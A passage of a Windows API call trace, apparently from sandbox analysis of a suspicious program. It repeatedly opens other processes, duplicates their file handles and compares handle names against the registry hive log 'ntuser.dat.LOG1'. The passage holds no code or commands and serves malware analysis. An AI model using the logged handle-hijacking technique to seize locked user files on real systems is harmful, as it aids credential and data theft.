CloseHandle (hObject=0x62c) returned 1 [0152.309] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8f4) returned 0x62c [0152.309] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.309] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.310] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.310] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.311] CloseHandle (hObject=0x670) returned 1 [0152.311] _wcsicmp (_Str1="\\MSBuild", _Str2="\\ntuser.dat.LOG1") returned -1 [0152.311] CloseHandle (hObject=0x680) returned 1 [0152.311] CloseHandle (hObject=0x62c) returned 1 [0152.311] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x904) returned 0x62c [0152.311] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.311] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.311] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.312] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.312] CloseHandle (hObject=0x670) returned 1 [0152.312] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.312] CloseHandle (hObject=0x680) returned 1 [0152.312] CloseHandle (hObject=0x62c) returned 1 [0152.312] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x904) returned 0x62c [0152.312] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.312] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.313] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.314] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.314] CloseHandle (hObject=0x670) returned 1 [0152.314] _wcsicmp (_Str1="\\MSBuild", _Str2="\\ntuser.dat.LOG1") returned -1 [0152.314] CloseHandle (hObject=0x680) returned 1 [0152.314] CloseHandle (hObject=0x62c) returned 1 [0152.314] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x914) returned 0x62c [0152.314] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.314] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.315] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.315] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.315] CloseHandle (hObject=0x670) returned 1 [0152.315] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.315] CloseHandle (hObject=0x680) returned 1 [0152.315] CloseHandle (hObject=0x62c) returned 1 [0152.316] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x914) returned 0x62c [0152.316] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.316] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.316] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.317] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.317] CloseHandle (hObject=0x670) returned 1 [0152.317] _wcsicmp (_Str1="\\Common Files", _Str2="\\ntuser.dat.LOG1") returned -11 [0152.317] CloseHandle (hObject=0x680) returned 1 [0152.317] CloseHandle (hObject=0x62c) returned 1 [0152.317] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x924) returned 0x62c [0152.317] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.317] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.318] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.319] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.319] CloseHandle (hObject=0x670) returned 1 [0152.319] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.319] CloseHandle (hObject=0x680) returned 1 [0152.319] CloseHandle (hObject=0x62c) returned 1 [0152.319] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x924) returned 0x62c [0152.319] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.319] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.319] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.321] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.321] CloseHandle (hObject=0x670) returned 1 [0152.321] _wcsicmp (_Str1="\\Common Files", _Str2="\\ntuser.dat.LOG1") returned -11 [0152.321] CloseHandle (hObject=0x680) returned 1 [0152.321] CloseHandle (hObject=0x62c) returned 1 [0152.321] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x934) returned 0x62c [0152.321] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.321] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.322] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.322] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.322] CloseHandle (hObject=0x670) returned 1 [0152.322] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.322] CloseHandle (hObject=0x680) returned 1 [0152.323] CloseHandle (hObject=0x62c) returned 1 [0152.323] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x934) returned 0x62c [0152.323] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.323] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.323] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.324] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.324] CloseHandle (hObject=0x670) returned 1 [0152.324] _wcsicmp (_Str1="\\Windows Journal", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.324] CloseHandle (hObject=0x680) returned 1 [0152.324] CloseHandle (hObject=0x62c) returned 1 [0152.324] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x944) returned 0x62c [0152.324] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.324] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.325] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.326] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.326] CloseHandle (hObject=0x670) returned 1 [0152.326] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.326] CloseHandle (hObject=0x680) returned 1 [0152.326] CloseHandle (hObject=0x62c) returned 1 [0152.326] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x944) returned 0x62c [0152.326] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.326] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.327] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.328] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.328] CloseHandle (hObject=0x670) returned 1 [0152.328] _wcsicmp (_Str1="\\Microsoft SQL Server Compact Edition", _Str2="\\ntuser.dat.LOG1") returned -1 [0152.328] CloseHandle (hObject=0x680) returned 1 [0152.328] CloseHandle (hObject=0x62c) returned 1 [0152.328] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x954) returned 0x62c [0152.328] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.328] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.329] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.329] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.329] CloseHandle (hObject=0x670) returned 1 [0152.329] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.329] CloseHandle (hObject=0x680) returned 1 [0152.330] CloseHandle (hObject=0x62c) returned 1 [0152.330] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x954) returned 0x62c [0152.330] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.330] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.330] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.331] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.331] CloseHandle (hObject=0x670) returned 1 [0152.331] _wcsicmp (_Str1="\\MSBuild", _Str2="\\ntuser.dat.LOG1") returned -1 [0152.331] CloseHandle (hObject=0x680) returned 1 [0152.331] CloseHandle (hObject=0x62c) returned 1 [0152.331] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x964) returned 0x62c [0152.331] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.331] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.332] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.333] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.333] CloseHandle (hObject=0x670) returned 1 [0152.333] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.333] CloseHandle (hObject=0x680) returned 1 [0152.333] CloseHandle (hObject=0x62c) returned 1 [0152.333] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x964) returned 0x62c [0152.333] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.333] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.334] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.335] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.335] CloseHandle (hObject=0x670) returned 1 [0152.335] _wcsicmp (_Str1="\\Windows Mail", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.335] CloseHandle (hObject=0x680) returned 1 [0152.335] CloseHandle (hObject=0x62c) returned 1 [0152.335] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x974) returned 0x62c [0152.335] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.335] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.336] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.336] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.336] CloseHandle (hObject=0x670) returned 1 [0152.336] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.336] CloseHandle (hObject=0x680) returned 1 [0152.336] CloseHandle (hObject=0x62c) returned 1 [0152.336] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x974) returned 0x62c [0152.336] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.337] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.337] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.338] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.338] CloseHandle (hObject=0x670) returned 1 [0152.338] _wcsicmp (_Str1="\\Uninstall Information", _Str2="\\ntuser.dat.LOG1") returned 7 [0152.338] CloseHandle (hObject=0x680) returned 1 [0152.338] CloseHandle (hObject=0x62c) returned 1 [0152.338] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x984) returned 0x62c [0152.338] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.338] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.338] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.339] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.339] CloseHandle (hObject=0x670) returned 1 [0152.339] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.339] CloseHandle (hObject=0x680) returned 1 [0152.339] CloseHandle (hObject=0x62c) returned 1 [0152.339] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x984) returned 0x62c [0152.339] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.339] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.340] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.341] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.341] CloseHandle (hObject=0x670) returned 1 [0152.341] _wcsicmp (_Str1="\\MSBuild", _Str2="\\ntuser.dat.LOG1") returned -1 [0152.341] CloseHandle (hObject=0x680) returned 1 [0152.341] CloseHandle (hObject=0x62c) returned 1 [0152.341] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x994) returned 0x62c [0152.341] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.341] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.342] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.343] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.343] CloseHandle (hObject=0x670) returned 1 [0152.343] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.343] CloseHandle (hObject=0x680) returned 1 [0152.343] CloseHandle (hObject=0x62c) returned 1 [0152.343] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x994) returned 0x62c [0152.343] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.343] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.344] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.344] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.344] CloseHandle (hObject=0x670) returned 1 [0152.345] _wcsicmp (_Str1="\\Windows Mail", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.345] CloseHandle (hObject=0x680) returned 1 [0152.345] CloseHandle (hObject=0x62c) returned 1 [0152.345] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9a4) returned 0x62c [0152.345] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.345] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.345] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.346] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.346] CloseHandle (hObject=0x670) returned 1 [0152.346] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.346] CloseHandle (hObject=0x680) returned 1 [0152.346] CloseHandle (hObject=0x62c) returned 1 [0152.346] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9a4) returned 0x62c [0152.346] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.346] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.347] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.349] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.349] CloseHandle (hObject=0x670) returned 1 [0152.349] _wcsicmp (_Str1="\\Windows Sidebar", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.349] CloseHandle (hObject=0x680) returned 1 [0152.349] CloseHandle (hObject=0x62c) returned 1 [0152.349] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9a4) returned 0x62c [0152.349] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x7c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.349] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.349] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.350] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.350] CloseHandle (hObject=0x670) returned 1 [0152.350] _wcsicmp (_Str1="\\StaticCache.dat", _Str2="\\ntuser.dat.LOG1") returned 5 [0152.350] CloseHandle (hObject=0x680) returned 1 [0152.350] CloseHandle (hObject=0x62c) returned 1 [0152.350] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9b4) returned 0x62c [0152.350] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.350] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.351] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.352] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.352] CloseHandle (hObject=0x670) returned 1 [0152.352] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.352] CloseHandle (hObject=0x680) returned 1 [0152.352] CloseHandle (hObject=0x62c) returned 1 [0152.352] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9b4) returned 0x62c [0152.352] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.352] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.353] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.353] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.354] CloseHandle (hObject=0x670) returned 1 [0152.354] _wcsicmp (_Str1="\\Microsoft Office", _Str2="\\ntuser.dat.LOG1") returned -1 [0152.354] CloseHandle (hObject=0x680) returned 1 [0152.354] CloseHandle (hObject=0x62c) returned 1 [0152.354] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9b4) returned 0x62c [0152.354] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x7c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.354] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.354] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.355] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.355] CloseHandle (hObject=0x670) returned 1 [0152.355] _wcsicmp (_Str1="\\StaticCache.dat", _Str2="\\ntuser.dat.LOG1") returned 5 [0152.355] CloseHandle (hObject=0x680) returned 1 [0152.355] CloseHandle (hObject=0x62c) returned 1 [0152.355] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9e8) returned 0x62c [0152.355] DuplicateHandle (in: hSourceProcessHandle=0x62c, 